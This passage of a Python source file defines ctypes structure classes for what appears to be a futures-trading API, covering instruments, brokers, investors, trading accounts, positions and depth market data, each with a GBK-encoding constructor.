("MortgageFundUseRange", c_char),
("ExchangeProductID", c_char_Array_31),
("UnderlyingMultiple", c_double),
]
def __init__(self, ProductID=None, ProductName=None, ExchangeID=None, ProductClass=None, VolumeMultiple=None, PriceTick=None, MaxMarketOrderVolume=None, MinMarketOrderVolume=None, MaxLimitOrderVolume=None, MinLimitOrderVolume=None, PositionType=None, PositionDateType=None, CloseDealType=None, TradeCurrencyID=None, MortgageFundUseRange=None, ExchangeProductID=None, UnderlyingMultiple=None):
super().__init__()
if ProductID:
self.ProductID = ProductID.encode("GBK")
if ProductName:
self.ProductName = ProductName.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ProductClass:
self.ProductClass = ProductClass.encode("GBK")
if VolumeMultiple:
self.VolumeMultiple = VolumeMultiple
if PriceTick:
self.PriceTick = PriceTick
if MaxMarketOrderVolume:
self.MaxMarketOrderVolume = MaxMarketOrderVolume
if MinMarketOrderVolume:
self.MinMarketOrderVolume = MinMarketOrderVolume
if MaxLimitOrderVolume:
self.MaxLimitOrderVolume = MaxLimitOrderVolume
if MinLimitOrderVolume:
self.MinLimitOrderVolume = MinLimitOrderVolume
if PositionType:
self.PositionType = PositionType.encode("GBK")
if PositionDateType:
self.PositionDateType = PositionDateType.encode("GBK")
if CloseDealType:
self.CloseDealType = CloseDealType.encode("GBK")
if TradeCurrencyID:
self.TradeCurrencyID = TradeCurrencyID.encode("GBK")
if MortgageFundUseRange:
self.MortgageFundUseRange = MortgageFundUseRange.encode("GBK")
if ExchangeProductID:
self.ExchangeProductID = ExchangeProductID.encode("GBK")
if UnderlyingMultiple:
self.UnderlyingMultiple = UnderlyingMultiple
class Instrument(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InstrumentName", c_char_Array_21),
("ExchangeInstID", c_char_Array_31),
("ProductID", c_char_Array_31),
("ProductClass", c_char),
("DeliveryYear", c_int),
("DeliveryMonth", c_int),
("MaxMarketOrderVolume", c_int),
("MinMarketOrderVolume", c_int),
("MaxLimitOrderVolume", c_int),
("MinLimitOrderVolume", c_int),
("VolumeMultiple", c_int),
("PriceTick", c_double),
("CreateDate", c_char_Array_9),
("OpenDate", c_char_Array_9),
("ExpireDate", c_char_Array_9),
("StartDelivDate", c_char_Array_9),
("EndDelivDate", c_char_Array_9),
("InstLifePhase", c_char),
("IsTrading", c_int),
("PositionType", c_char),
("PositionDateType", c_char),
("LongMarginRatio", c_double),
("ShortMarginRatio", c_double),
("MaxMarginSideAlgorithm", c_char),
("UnderlyingInstrID", c_char_Array_31),
("StrikePrice", c_double),
("OptionsType", c_char),
("UnderlyingMultiple", c_double),
("CombinationType", c_char),
]
def __init__(self, InstrumentID=None, ExchangeID=None, InstrumentName=None, ExchangeInstID=None, ProductID=None, ProductClass=None, DeliveryYear=None, DeliveryMonth=None, MaxMarketOrderVolume=None, MinMarketOrderVolume=None, MaxLimitOrderVolume=None, MinLimitOrderVolume=None, VolumeMultiple=None, PriceTick=None, CreateDate=None, OpenDate=None, ExpireDate=None, StartDelivDate=None, EndDelivDate=None, InstLifePhase=None, IsTrading=None, PositionType=None, PositionDateType=None, LongMarginRatio=None, ShortMarginRatio=None, MaxMarginSideAlgorithm=None, UnderlyingInstrID=None, StrikePrice=None, OptionsType=None, UnderlyingMultiple=None, CombinationType=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InstrumentName:
self.InstrumentName = InstrumentName.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ProductID:
self.ProductID = ProductID.encode("GBK")
if ProductClass:
self.ProductClass = ProductClass.encode("GBK")
if DeliveryYear:
self.DeliveryYear = DeliveryYear
if DeliveryMonth:
self.DeliveryMonth = DeliveryMonth
if MaxMarketOrderVolume:
self.MaxMarketOrderVolume = MaxMarketOrderVolume
if MinMarketOrderVolume:
self.MinMarketOrderVolume = MinMarketOrderVolume
if MaxLimitOrderVolume:
self.MaxLimitOrderVolume = MaxLimitOrderVolume
if MinLimitOrderVolume:
self.MinLimitOrderVolume = MinLimitOrderVolume
if VolumeMultiple:
self.VolumeMultiple = VolumeMultiple
if PriceTick:
self.PriceTick = PriceTick
if CreateDate:
self.CreateDate = CreateDate.encode("GBK")
if OpenDate:
self.OpenDate = OpenDate.encode("GBK")
if ExpireDate:
self.ExpireDate = ExpireDate.encode("GBK")
if StartDelivDate:
self.StartDelivDate = StartDelivDate.encode("GBK")
if EndDelivDate:
self.EndDelivDate = EndDelivDate.encode("GBK")
if InstLifePhase:
self.InstLifePhase = InstLifePhase.encode("GBK")
if IsTrading:
self.IsTrading = IsTrading
if PositionType:
self.PositionType = PositionType.encode("GBK")
if PositionDateType:
self.PositionDateType = PositionDateType.encode("GBK")
if LongMarginRatio:
self.LongMarginRatio = LongMarginRatio
if ShortMarginRatio:
self.ShortMarginRatio = ShortMarginRatio
if MaxMarginSideAlgorithm:
self.MaxMarginSideAlgorithm = MaxMarginSideAlgorithm.encode("GBK")
if UnderlyingInstrID:
self.UnderlyingInstrID = UnderlyingInstrID.encode("GBK")
if StrikePrice:
self.StrikePrice = StrikePrice
if OptionsType:
self.OptionsType = OptionsType.encode("GBK")
if UnderlyingMultiple:
self.UnderlyingMultiple = UnderlyingMultiple
if CombinationType:
self.CombinationType = CombinationType.encode("GBK")
class Broker(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("BrokerAbbr", c_char_Array_9),
("BrokerName", c_char_Array_81),
("IsActive", c_int),
]
def __init__(self, BrokerID=None, BrokerAbbr=None, BrokerName=None, IsActive=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerAbbr:
self.BrokerAbbr = BrokerAbbr.encode("GBK")
if BrokerName:
self.BrokerName = BrokerName.encode("GBK")
if IsActive:
self.IsActive = IsActive
class Trader(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
("ParticipantID", c_char_Array_11),
("Password", c_char_Array_41),
("InstallCount", c_int),
("BrokerID", c_char_Array_11),
]
def __init__(self, ExchangeID=None, TraderID=None, ParticipantID=None, Password=None, InstallCount=None, BrokerID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallCount:
self.InstallCount = InstallCount
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class Investor(Struct):
_fields_ = [
("InvestorID", c_char_Array_13),
("BrokerID", c_char_Array_11),
("InvestorGroupID", c_char_Array_13),
("InvestorName", c_char_Array_81),
("IdentifiedCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("IsActive", c_int),
("Telephone", c_char_Array_41),
("Address", c_char_Array_101),
("OpenDate", c_char_Array_9),
("Mobile", c_char_Array_41),
("CommModelID", c_char_Array_13),
("MarginModelID", c_char_Array_13),
]
def __init__(self, InvestorID=None, BrokerID=None, InvestorGroupID=None, InvestorName=None, IdentifiedCardType=None, IdentifiedCardNo=None, IsActive=None, Telephone=None, Address=None, OpenDate=None, Mobile=None, CommModelID=None, MarginModelID=None):
super().__init__()
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorGroupID:
self.InvestorGroupID = InvestorGroupID.encode("GBK")
if InvestorName:
self.InvestorName = InvestorName.encode("GBK")
if IdentifiedCardType:
self.IdentifiedCardType = IdentifiedCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if IsActive:
self.IsActive = IsActive
if Telephone:
self.Telephone = Telephone.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if OpenDate:
self.OpenDate = OpenDate.encode("GBK")
if Mobile:
self.Mobile = Mobile.encode("GBK")
if CommModelID:
self.CommModelID = CommModelID.encode("GBK")
if MarginModelID:
self.MarginModelID = MarginModelID.encode("GBK")
class TradingCode(Struct):
_fields_ = [
("InvestorID", c_char_Array_13),
("BrokerID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("ClientID", c_char_Array_11),
("IsActive", c_int),
("ClientIDType", c_char),
("BranchID", c_char_Array_9),
("BizType", c_char),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, InvestorID=None, BrokerID=None, ExchangeID=None, ClientID=None, IsActive=None, ClientIDType=None, BranchID=None, BizType=None, InvestUnitID=None):
super().__init__()
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IsActive:
self.IsActive = IsActive
if ClientIDType:
self.ClientIDType = ClientIDType.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if BizType:
self.BizType = BizType.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class PartBroker(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("IsActive", c_int),
]
def __init__(self, BrokerID=None, ExchangeID=None, ParticipantID=None, IsActive=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if IsActive:
self.IsActive = IsActive
class SuperUser(Struct):
_fields_ = [
("UserID", c_char_Array_16),
("UserName", c_char_Array_81),
("Password", c_char_Array_41),
("IsActive", c_int),
]
def __init__(self, UserID=None, UserName=None, Password=None, IsActive=None):
super().__init__()
if UserID:
self.UserID = UserID.encode("GBK")
if UserName:
self.UserName = UserName.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if IsActive:
self.IsActive = IsActive
class SuperUserFunction(Struct):
_fields_ = [
("UserID", c_char_Array_16),
("FunctionCode", c_char),
]
def __init__(self, UserID=None, FunctionCode=None):
super().__init__()
if UserID:
self.UserID = UserID.encode("GBK")
if FunctionCode:
self.FunctionCode = FunctionCode.encode("GBK")
class InvestorGroup(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorGroupID", c_char_Array_13),
("InvestorGroupName", c_char_Array_41),
]
def __init__(self, BrokerID=None, InvestorGroupID=None, InvestorGroupName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorGroupID:
self.InvestorGroupID = InvestorGroupID.encode("GBK")
if InvestorGroupName:
self.InvestorGroupName = InvestorGroupName.encode("GBK")
class TradingAccount(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("PreMortgage", c_double),
("PreCredit", c_double),
("PreDeposit", c_double),
("PreBalance", c_double),
("PreMargin", c_double),
("InterestBase", c_double),
("Interest", c_double),
("Deposit", c_double),
("Withdraw", c_double),
("FrozenMargin", c_double),
("FrozenCash", c_double),
("FrozenCommission", c_double),
("CurrMargin", c_double),
("CashIn", c_double),
("Commission", c_double),
("CloseProfit", c_double),
("PositionProfit", c_double),
("Balance", c_double),
("Available", c_double),
("WithdrawQuota", c_double),
("Reserve", c_double),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("Credit", c_double),
("Mortgage", c_double),
("ExchangeMargin", c_double),
("DeliveryMargin", c_double),
("ExchangeDeliveryMargin", c_double),
("ReserveBalance", c_double),
("CurrencyID", c_char_Array_4),
("PreFundMortgageIn", c_double),
("PreFundMortgageOut", c_double),
("FundMortgageIn", c_double),
("FundMortgageOut", c_double),
("FundMortgageAvailable", c_double),
("MortgageableFund", c_double),
("SpecProductMargin", c_double),
("SpecProductFrozenMargin", c_double),
("SpecProductCommission", c_double),
("SpecProductFrozenCommission", c_double),
("SpecProductPositionProfit", c_double),
("SpecProductCloseProfit", c_double),
("SpecProductPositionProfitByAlg", c_double),
("SpecProductExchangeMargin", c_double),
("BizType", c_char),
("FrozenSwap", c_double),
("RemainSwap", c_double),
]
def __init__(self, BrokerID=None, AccountID=None, PreMortgage=None, PreCredit=None, PreDeposit=None, PreBalance=None, PreMargin=None, InterestBase=None, Interest=None, Deposit=None, Withdraw=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CurrMargin=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, Balance=None, Available=None, WithdrawQuota=None, Reserve=None, TradingDay=None, SettlementID=None, Credit=None, Mortgage=None, ExchangeMargin=None, DeliveryMargin=None, ExchangeDeliveryMargin=None, ReserveBalance=None, CurrencyID=None, PreFundMortgageIn=None, PreFundMortgageOut=None, FundMortgageIn=None, FundMortgageOut=None, FundMortgageAvailable=None, MortgageableFund=None, SpecProductMargin=None, SpecProductFrozenMargin=None, SpecProductCommission=None, SpecProductFrozenCommission=None, SpecProductPositionProfit=None, SpecProductCloseProfit=None, SpecProductPositionProfitByAlg=None, SpecProductExchangeMargin=None, BizType=None, FrozenSwap=None, RemainSwap=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if PreMortgage:
self.PreMortgage = PreMortgage
if PreCredit:
self.PreCredit = PreCredit
if PreDeposit:
self.PreDeposit = PreDeposit
if PreBalance:
self.PreBalance = PreBalance
if PreMargin:
self.PreMargin = PreMargin
if InterestBase:
self.InterestBase = InterestBase
if Interest:
self.Interest = Interest
if Deposit:
self.Deposit = Deposit
if Withdraw:
self.Withdraw = Withdraw
if FrozenMargin:
self.FrozenMargin = FrozenMargin
if FrozenCash:
self.FrozenCash = FrozenCash
if FrozenCommission:
self.FrozenCommission = FrozenCommission
if CurrMargin:
self.CurrMargin = CurrMargin
if CashIn:
self.CashIn = CashIn
if Commission:
self.Commission = Commission
if CloseProfit:
self.CloseProfit = CloseProfit
if PositionProfit:
self.PositionProfit = PositionProfit
if Balance:
self.Balance = Balance
if Available:
self.Available = Available
if WithdrawQuota:
self.WithdrawQuota = WithdrawQuota
if Reserve:
self.Reserve = Reserve
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if Credit:
self.Credit = Credit
if Mortgage:
self.Mortgage = Mortgage
if ExchangeMargin:
self.ExchangeMargin = ExchangeMargin
if DeliveryMargin:
self.DeliveryMargin = DeliveryMargin
if ExchangeDeliveryMargin:
self.ExchangeDeliveryMargin = ExchangeDeliveryMargin
if ReserveBalance:
self.ReserveBalance = ReserveBalance
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if PreFundMortgageIn:
self.PreFundMortgageIn = PreFundMortgageIn
if PreFundMortgageOut:
self.PreFundMortgageOut = PreFundMortgageOut
if FundMortgageIn:
self.FundMortgageIn = FundMortgageIn
if FundMortgageOut:
self.FundMortgageOut = FundMortgageOut
if FundMortgageAvailable:
self.FundMortgageAvailable = FundMortgageAvailable
if MortgageableFund:
self.MortgageableFund = MortgageableFund
if SpecProductMargin:
self.SpecProductMargin = SpecProductMargin
if SpecProductFrozenMargin:
self.SpecProductFrozenMargin = SpecProductFrozenMargin
if SpecProductCommission:
self.SpecProductCommission = SpecProductCommission
if SpecProductFrozenCommission:
self.SpecProductFrozenCommission = SpecProductFrozenCommission
if SpecProductPositionProfit:
self.SpecProductPositionProfit = SpecProductPositionProfit
if SpecProductCloseProfit:
self.SpecProductCloseProfit = SpecProductCloseProfit
if SpecProductPositionProfitByAlg:
self.SpecProductPositionProfitByAlg = SpecProductPositionProfitByAlg
if SpecProductExchangeMargin:
self.SpecProductExchangeMargin = SpecProductExchangeMargin
if BizType:
self.BizType = BizType.encode("GBK")
if FrozenSwap:
self.FrozenSwap = FrozenSwap
if RemainSwap:
self.RemainSwap = RemainSwap
class InvestorPosition(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("PosiDirection", c_char),
("HedgeFlag", c_char),
("PositionDate", c_char),
("YdPosition", c_int),
("Position", c_int),
("LongFrozen", c_int),
("ShortFrozen", c_int),
("LongFrozenAmount", c_double),
("ShortFrozenAmount", c_double),
("OpenVolume", c_int),
("CloseVolume", c_int),
("OpenAmount", c_double),
("CloseAmount", c_double),
("PositionCost", c_double),
("PreMargin", c_double),
("UseMargin", c_double),
("FrozenMargin", c_double),
("FrozenCash", c_double),
("FrozenCommission", c_double),
("CashIn", c_double),
("Commission", c_double),
("CloseProfit", c_double),
("PositionProfit", c_double),
("PreSettlementPrice", c_double),
("SettlementPrice", c_double),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OpenCost", c_double),
("ExchangeMargin", c_double),
("CombPosition", c_int),
("CombLongFrozen", c_int),
("CombShortFrozen", c_int),
("CloseProfitByDate", c_double),
("CloseProfitByTrade", c_double),
("TodayPosition", c_int),
("MarginRateByMoney", c_double),
("MarginRateByVolume", c_double),
("StrikeFrozen", c_int),
("StrikeFrozenAmount", c_double),
("AbandonFrozen", c_int),
("ExchangeID", c_char_Array_9),
("YdStrikeFrozen", c_int),
("InvestUnitID", c_char_Array_17),
("PositionCostOffset", c_double),
]
def __init__(self, InstrumentID=None, BrokerID=None, InvestorID=None, PosiDirection=None, HedgeFlag=None, PositionDate=None, YdPosition=None, Position=None, LongFrozen=None, ShortFrozen=None, LongFrozenAmount=None, ShortFrozenAmount=None, OpenVolume=None, CloseVolume=None, OpenAmount=None, CloseAmount=None, PositionCost=None, PreMargin=None, UseMargin=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, PreSettlementPrice=None, SettlementPrice=None, TradingDay=None, SettlementID=None, OpenCost=None, ExchangeMargin=None, CombPosition=None, CombLongFrozen=None, CombShortFrozen=None, CloseProfitByDate=None, CloseProfitByTrade=None, TodayPosition=None, MarginRateByMoney=None, MarginRateByVolume=None, StrikeFrozen=None, StrikeFrozenAmount=None, AbandonFrozen=None, ExchangeID=None, YdStrikeFrozen=None, InvestUnitID=None, PositionCostOffset=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if PosiDirection:
self.PosiDirection = PosiDirection.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if PositionDate:
self.PositionDate = PositionDate.encode("GBK")
if YdPosition:
self.YdPosition = YdPosition
if Position:
self.Position = Position
if LongFrozen:
self.LongFrozen = LongFrozen
if ShortFrozen:
self.ShortFrozen = ShortFrozen
if LongFrozenAmount:
self.LongFrozenAmount = LongFrozenAmount
if ShortFrozenAmount:
self.ShortFrozenAmount = ShortFrozenAmount
if OpenVolume:
self.OpenVolume = OpenVolume
if CloseVolume:
self.CloseVolume = CloseVolume
if OpenAmount:
self.OpenAmount = OpenAmount
if CloseAmount:
self.CloseAmount = CloseAmount
if PositionCost:
self.PositionCost = PositionCost
if PreMargin:
self.PreMargin = PreMargin
if UseMargin:
self.UseMargin = UseMargin
if FrozenMargin:
self.FrozenMargin = FrozenMargin
if FrozenCash:
self.FrozenCash = FrozenCash
if FrozenCommission:
self.FrozenCommission = FrozenCommission
if CashIn:
self.CashIn = CashIn
if Commission:
self.Commission = Commission
if CloseProfit:
self.CloseProfit = CloseProfit
if PositionProfit:
self.PositionProfit = PositionProfit
if PreSettlementPrice:
self.PreSettlementPrice = PreSettlementPrice
if SettlementPrice:
self.SettlementPrice = SettlementPrice
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OpenCost:
self.OpenCost = OpenCost
if ExchangeMargin:
self.ExchangeMargin = ExchangeMargin
if CombPosition:
self.CombPosition = CombPosition
if CombLongFrozen:
self.CombLongFrozen = CombLongFrozen
if CombShortFrozen:
self.CombShortFrozen = CombShortFrozen
if CloseProfitByDate:
self.CloseProfitByDate = CloseProfitByDate
if CloseProfitByTrade:
self.CloseProfitByTrade = CloseProfitByTrade
if TodayPosition:
self.TodayPosition = TodayPosition
if MarginRateByMoney:
self.MarginRateByMoney = MarginRateByMoney
if MarginRateByVolume:
self.MarginRateByVolume = MarginRateByVolume
if StrikeFrozen:
self.StrikeFrozen = StrikeFrozen
if StrikeFrozenAmount:
self.StrikeFrozenAmount = StrikeFrozenAmount
if AbandonFrozen:
self.AbandonFrozen = AbandonFrozen
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if YdStrikeFrozen:
self.YdStrikeFrozen = YdStrikeFrozen
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if PositionCostOffset:
self.PositionCostOffset = PositionCostOffset
class InstrumentMarginRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("HedgeFlag", c_char),
("LongMarginRatioByMoney", c_double),
("LongMarginRatioByVolume", c_double),
("ShortMarginRatioByMoney", c_double),
("ShortMarginRatioByVolume", c_double),
("IsRelative", c_int),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, IsRelative=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if LongMarginRatioByMoney:
self.LongMarginRatioByMoney = LongMarginRatioByMoney
if LongMarginRatioByVolume:
self.LongMarginRatioByVolume = LongMarginRatioByVolume
if ShortMarginRatioByMoney:
self.ShortMarginRatioByMoney = ShortMarginRatioByMoney
if ShortMarginRatioByVolume:
self.ShortMarginRatioByVolume = ShortMarginRatioByVolume
if IsRelative:
self.IsRelative = IsRelative
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class InstrumentCommissionRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OpenRatioByMoney", c_double),
("OpenRatioByVolume", c_double),
("CloseRatioByMoney", c_double),
("CloseRatioByVolume", c_double),
("CloseTodayRatioByMoney", c_double),
("CloseTodayRatioByVolume", c_double),
("ExchangeID", c_char_Array_9),
("BizType", c_char),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None, ExchangeID=None, BizType=None, InvestUnitID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OpenRatioByMoney:
self.OpenRatioByMoney = OpenRatioByMoney
if OpenRatioByVolume:
self.OpenRatioByVolume = OpenRatioByVolume
if CloseRatioByMoney:
self.CloseRatioByMoney = CloseRatioByMoney
if CloseRatioByVolume:
self.CloseRatioByVolume = CloseRatioByVolume
if CloseTodayRatioByMoney:
self.CloseTodayRatioByMoney = CloseTodayRatioByMoney
if CloseTodayRatioByVolume:
self.CloseTodayRatioByVolume = CloseTodayRatioByVolume
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if BizType:
self.BizType = BizType.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class DepthMarketData(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("ExchangeInstID", c_char_Array_31),
("LastPrice", c_double),
("PreSettlementPrice", c_double),
("PreClosePrice", c_double),
("PreOpenInterest", c_double),
("OpenPrice", c_double),
("HighestPrice", c_double),
("LowestPrice", c_double),
("Volume", c_int),
("Turnover", c_double),
("OpenInterest", c_double),
("ClosePrice", c_double),
("SettlementPrice", c_double),
("UpperLimitPrice", c_double),
("LowerLimitPrice", c_double),
("PreDelta", c_double),
("CurrDelta", c_double),
("UpdateTime", c_char_Array_9),
("UpdateMillisec", c_int),
("BidPrice1", c_double),
("BidVolume1", c_int),
("AskPrice1", c_double),
("AskVolume1", c_int),
("BidPrice2", c_double),
("BidVolume2", c_int),
("AskPrice2", c_double),
("AskVolume2", c_int),
("BidPrice3", c_double),
("BidVolume3", c_int),
("AskPrice3", c_double),
("AskVolume3", c_int),
("BidPrice4", c_double),
("BidVolume4", c_int),
("AskPrice4", c_double),
("AskVolume4", c_int),
("BidPrice5", c_double),
("BidVolume5", c_int),
("AskPrice5", c_double),
("AskVolume5", c_int),
("AveragePrice", c_double),
("ActionDay", c_char_Array_9),
]
def __init__(self, TradingDay=None, InstrumentID=None, ExchangeID=None, ExchangeInstID=None, LastPrice=None, PreSettlementPrice=None, PreClosePrice=None, PreOpenInterest=None, OpenPrice=None, HighestPrice=None, LowestPrice=None, Volume=None, Turnover=None, OpenInterest=None, ClosePrice=None, SettlementPrice=None, UpperLimitPrice=None, LowerLimitPrice=None, PreDelta=None, CurrDelta=None, UpdateTime=None, UpdateMillisec=None, BidPrice1=None, BidVolume1=None, AskPrice1=None, AskVolume1=None, BidPrice2=None, BidVolume2=None, AskPrice2=None, AskVolume2=None, BidPrice3=None, BidVolume3=None, AskPrice3=None, AskVolume3=None, BidPrice4=None, BidVolume4=None, AskPrice4=None, AskVolume4=None, BidPrice5=None, BidVolume5=None, AskPrice5=None, AskVolume5=None, AveragePrice=None, ActionDay=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if LastPrice:
self.LastPrice = LastPrice
if PreSettlementPrice:
self.PreSettlementPrice = PreSettlementPrice
if PreClosePrice:
self.PreClosePrice = PreClosePrice
if PreOpenInterest:
self.PreOpenInterest = PreOpenInterest
if OpenPrice:
self.OpenPrice = OpenPrice
if HighestPrice:
self.HighestPrice = HighestPrice
if LowestPrice:
self.LowestPrice = LowestPrice
if Volume:
self.Volume = Volume
if Turnover:
self.Turnover = Turnover
if OpenInterest:
self.OpenInterest = OpenInterest
if ClosePrice:
self.ClosePrice = ClosePrice
if SettlementPrice:
self.SettlementPrice = SettlementPrice
if UpperLimitPrice:
self.UpperLimitPrice = UpperLimitPrice
if LowerLimitPrice:
self.LowerLimitPrice = LowerLimitPrice
if PreDelta:
self.PreDelta = PreDelta
if CurrDelta:
self.CurrDelta = CurrDelta
if UpdateTime:
self.UpdateTime = UpdateTime.encode("GBK")
if UpdateMillisec:
self.UpdateMillisec = UpdateMillisec
if BidPrice1:
self.BidPrice1 = BidPrice1
if BidVolume1:
self.BidVolume1 = BidVolume1
if AskPrice1:
self.AskPrice1 = AskPrice1
if AskVolume1:
self.AskVolume1 = AskVolume1
if BidPrice2:
self.BidPrice2 = BidPrice2
if BidVolume2:
self.BidVolume2 = BidVolume2
if AskPrice2:
self.AskPrice2 = AskPrice2
if AskVolume2:
self.AskVolume2 = AskVolume2
if BidPrice3:
self.BidPrice3 = BidPrice3
if BidVolume3:
self.BidVolume3 = BidVolume3
if AskPrice3:
self.AskPrice3 = AskPrice3
if AskVolume3:
self.AskVolume3 = AskVolume3
if BidPrice4:
self.BidPrice4 = BidPrice4
if BidVolume4:
self.BidVolume4 = BidVolume4
if AskPrice4:
self.AskPrice4 = AskPrice4
if AskVolume4:
self.AskVolume4 = AskVolume4
if BidPrice5:
self.BidPrice5 = BidPrice5
if BidVolume5:
self.BidVolume5 = BidVolume5
if AskPrice5:
self.AskPrice5 = AskPrice5
if AskVolume5:
self.AskVolume5 = AskVolume5
if AveragePrice:
self.AveragePrice = AveragePrice
if ActionDay:
self.ActionDay = ActionDay.encode("GBK")
class InstrumentTradingRight(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("TradingRight", c_char),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, TradingRight=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if TradingRight:
self.TradingRight = TradingRight.encode("GBK")
class BrokerUser(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("UserName", c_char_Array_81),
("UserType", c_char),
("IsActive", c_int),
("IsUsingOTP", c_int),
("IsAuthForce", c_int),
]
def __init__(self, BrokerID=None, UserID=None, UserName=None, UserType=None, IsActive=None, IsUsingOTP=None, IsAuthForce=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
